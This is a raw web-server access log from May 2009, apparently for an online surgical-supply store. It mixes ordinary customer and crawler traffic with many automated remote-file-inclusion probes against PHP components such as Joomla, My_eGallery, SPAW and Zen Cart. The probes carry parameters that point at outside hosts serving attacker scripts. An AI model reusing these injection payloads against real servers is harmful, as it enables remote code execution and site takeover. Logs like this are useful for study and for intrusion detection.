110.45.146.88 - - [08/May/2009:01:02:51 -0400] "GET /logs/access_log.Q108122800%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.89.31.105 - - [08/May/2009:01:02:52 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
75.125.245.26 - - [08/May/2009:01:02:52 -0400] "GET /logs/access_log.Q108122200//components/com_simpleboard/image_upload.php?sbp=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
75.125.245.26 - - [08/May/2009:01:02:52 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
75.125.245.26 - - [08/May/2009:01:02:52 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
110.45.146.146 - - [08/May/2009:01:02:57 -0400] "GET /logs/access_log.Q108081300%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
75.125.245.26 - - [08/May/2009:01:02:59 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
121.165.73.157 - - [08/May/2009:01:03:03 -0400] "GET /logs/access_log.Q109020100%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:01:03:03 -0400] "GET /logs/access_log.Q108122800%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:01:03:03 -0400] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:01:03:03 -0400] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:01:03:07 -0400] "GET /logs/access_log.Q109010400%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.125.64.38 - - [08/May/2009:01:03:09 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
219.94.148.39 - - [08/May/2009:01:03:12 -0400] "GET /logs//modules/SPChat/images/12.php?teste=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
219.94.148.39 - - [08/May/2009:01:03:12 -0400] "GET //modules/SPChat/images/12.php?teste=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
219.94.148.39 - - [08/May/2009:01:03:12 -0400] "GET /logs/access_log.Q108091400//modules/SPChat/images/12.php?teste=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
76.93.9.125 - - [08/May/2009:01:03:12 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76103 "http://www.acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
75.125.245.26 - - [08/May/2009:01:03:16 -0400] "GET /logs/access_log.Q108091300//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
75.125.245.26 - - [08/May/2009:01:03:16 -0400] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
75.125.245.26 - - [08/May/2009:01:03:16 -0400] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
110.45.146.88 - - [08/May/2009:01:03:19 -0400] "GET /logs/access_log.Q108121000%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
75.125.245.26 - - [08/May/2009:01:03:22 -0400] "GET /logs/access_log.Q109032900//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
88.84.128.40 - - [08/May/2009:01:03:29 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:01:03:30 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:01:03:30 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
209.59.12.99 - - [08/May/2009:01:03:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.84.128.40 - - [08/May/2009:01:03:35 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
110.45.146.146 - - [08/May/2009:01:03:37 -0400] "GET /logs/access_log.Q109013000%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:01:03:48 -0400] "GET /logs/access_log.Q108102400%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:01:03:48 -0400] "GET /logs/access_log.Q109040500%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:01:03:49 -0400] "GET /logs/access_log.Q108082900%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:03:54 -0400] "GET /logs/access_log.Q108100900%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:04:08 -0400] "GET /logs/access_log.Q109032700%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:04:32 -0400] "GET /logs/access_log.Q108081300%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:01:04:38 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006EB84246806700F4DB08U+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
110.45.146.88 - - [08/May/2009:01:04:38 -0400] "GET /logs/access_log.Q108100900%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:04:42 -0400] "GET /logs/access_log.Q108122800%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:04:49 -0400] "GET /logs/access_log.Q109032700%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:04:58 -0400] "GET /logs/access_log.Q108081300%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:05:07 -0400] "GET /logs/access_log.Q108122800%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
219.94.148.39 - - [08/May/2009:01:05:10 -0400] "GET /logs/access_log.Q108091400%20%20//modules/SPChat/images/12.php?teste=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:05:25 -0400] "GET /logs/access_log.Q109013000%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:01:05:27 -0400] "GET /logs/error_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
110.45.146.88 - - [08/May/2009:01:05:36 -0400] "GET /logs/access_log.Q108082900%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:05:36 -0400] "GET /logs/access_log.Q108102400%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:01:05:36 -0400] "GET /logs/access_log.Q109040500%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
76.93.9.125 - - [08/May/2009:01:05:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
110.45.146.88 - - [08/May/2009:01:05:40 -0400] "GET /logs/access_log.Q109013000%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
210.239.42.208 - - [08/May/2009:01:05:43 -0400] "GET /errors.php?error=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/ngene.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
76.93.9.125 - - [08/May/2009:01:05:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:49 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76103 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
110.45.146.88 - - [08/May/2009:01:05:50 -0400] "GET /logs/access_log.Q108082900%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
76.93.9.125 - - [08/May/2009:01:05:51 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
110.45.146.88 - - [08/May/2009:01:05:51 -0400] "GET /logs/access_log.Q108102400%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
76.93.9.125 - - [08/May/2009:01:05:51 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:51 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:51 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:52 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:52 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:52 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:52 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:52 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:52 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:52 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:52 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:53 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:53 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:53 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:53 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:53 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:53 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:53 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:54 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:54 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
110.45.146.88 - - [08/May/2009:01:05:54 -0400] "GET /logs/access_log.Q109040500%20%20/modules/My_eGallery/index.php?basepath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
76.93.9.125 - - [08/May/2009:01:05:54 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:54 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:54 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:54 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:54 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:55 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:55 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:05:59 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:06:07 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG HTTP/1.1" 200 61561 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:06:11 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:06:11 -0400] "GET /images/items/3232000_THUMB.JPG HTTP/1.1" 200 1058 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:06:11 -0400] "GET /images/items/3231000_THUMB.JPG HTTP/1.1" 200 3373 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:06:11 -0400] "GET /images/items/3233000_THUMB.JPG HTTP/1.1" 200 1941 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:06:12 -0400] "GET /images/items/3231002_THUMB.JPG HTTP/1.1" 200 2115 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:06:12 -0400] "GET /images/items/3231001_THUMB.JPG HTTP/1.1" 200 939 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:06:12 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:06:12 -0400] "GET /images/items/3231003_THUMB.JPG HTTP/1.1" 200 1116 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:06:12 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:06:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG HTTP/1.1" 200 52085 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:06:41 -0400] "GET /images/items/NUOSSCOLLAGEN_THUMB.JPG HTTP/1.1" 200 2818 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
202.53.250.22 - - [08/May/2009:01:06:56 -0400] "GET /logs/access_log.Q108122800//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 294 "-" "libwww-perl/5.805"
76.93.9.125 - - [08/May/2009:01:07:02 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
202.53.250.22 - - [08/May/2009:01:07:03 -0400] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
